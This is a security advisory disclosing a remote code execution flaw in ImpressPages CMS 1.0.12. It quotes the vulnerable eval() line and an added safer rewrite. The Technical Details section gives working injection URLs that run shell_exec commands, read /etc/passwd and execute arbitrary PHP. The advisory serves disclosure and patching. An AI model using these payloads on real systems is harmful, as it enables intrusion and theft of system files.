=======
Summary
=======
Name: Remote code execution in ImpressPages CMS
Release Date: 5 January 2012
Reference: NGS00109
Discoverer: David Middlehurst <david.middlehurst@xxxxxxxxxxxxx>
Vendor: ImpressPages
Vendor Reference:
Systems Affected: ImpressPages CMS 1.0.12
Risk: High
Status: Published

========
TimeLine
========
Discovered: 28 August 2011
Released: 28 August 2011
Approved: 28 August 2011
Reported: 5 September 2011
Fixed: 21 September 2011
Published: 5 January 2012

===========
Description
===========
ImpressPages CMS (1.0.12) is prone to a remote command execution attack due to an unsanitised eval() code execution flaw.

=================
Technical Details
=================
http://host/impresspages/?cm_group=text_photos\title\Module();echo%20shell_exec('ls%20-alh');echo&cm_name=test

http://host/impresspages/?cm_group=text_photos\title\Module();echo%20file_get_contents('/etc/passwd');echo&cm_name=test

http://host/impresspages/?cm_group=text_photos\title\Module();[[ArbitraryPHP Code Here]];echo&cm_name=test

The affected code:

File: /ip_cms/modules/standard/content_management/actions.php
Line 37

    if(isset($_REQUEST['cm_group']) && isset($_REQUEST['cm_name'])) {
        eval (' $new_module = new \\Modules\\standard\\content_management\\Widgets\\'.$_REQUEST['cm_group'].'\\'.$_REQUEST['cm_name'].'\\Module(); ');
        $new_module->makeActions();
    }

===============
Fix Information
===============
Please update all instances of Impress Pages to the 1.0.13 release:
http://www.impresspages.org/news/impresspages-1-0-13-security-release/

NGS Secure Research
http://www.ngssecure.com
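
An added example, not code from the advisory and not the vendor's 1.0.13 patch: one way to do the dynamic widget instantiation from actions.php without eval(), by accepting only plain PHP identifiers for cm_group and cm_name. The helper name resolveWidgetClass() and the 400 response are assumptions made for this sketch.

```php
<?php
// Added example (not ImpressPages code). Replaces the eval() shown in the
// advisory with a validated class name and PHP's "new $class" syntax.

const WIDGET_NS = 'Modules\\standard\\content_management\\Widgets\\';

/**
 * Hypothetical helper: build the widget class name from the two request
 * parameters. Returns null unless both parts are single identifiers and the
 * resulting class exists and has a makeActions() method.
 */
function resolveWidgetClass($group, $name)
{
    foreach (array($group, $name) as $part) {
        // Reject arrays (?cm_group[]=x) and anything that is not one identifier:
        // backslashes, parentheses, semicolons, quotes and spaces never pass.
        if (!is_string($part) || !preg_match('/\A[A-Za-z_][A-Za-z0-9_]*\z/', $part)) {
            return null;
        }
    }
    $class = WIDGET_NS . $group . '\\' . $name . '\\Module';
    if (!class_exists($class) || !method_exists($class, 'makeActions')) {
        return null;
    }
    return $class;
}

if (isset($_REQUEST['cm_group']) && isset($_REQUEST['cm_name'])) {
    $class = resolveWidgetClass($_REQUEST['cm_group'], $_REQUEST['cm_name']);
    if ($class === null) {
        header('HTTP/1.1 400 Bad Request');
        exit;
    }
    $new_module = new $class();   // the name is data here, never parsed as code
    $new_module->makeActions();
}

if (PHP_SAPI === 'cli') {
    // Self-check using the cm_group value from the advisory's first URL (decoded)
    // and a well-formed pair; neither resolves here because no widget classes
    // are loaded when this file is run on its own.
    $payload = "text_photos\\title\\Module();echo shell_exec('ls -alh');echo";
    var_dump(resolveWidgetClass($payload, 'test'));
    var_dump(resolveWidgetClass('text_photos', 'title'));
}
```

With the identifier check in place the request value can only select a class name under the Widgets namespace; the class_exists() and method_exists() checks then limit it to classes that are actually widget modules.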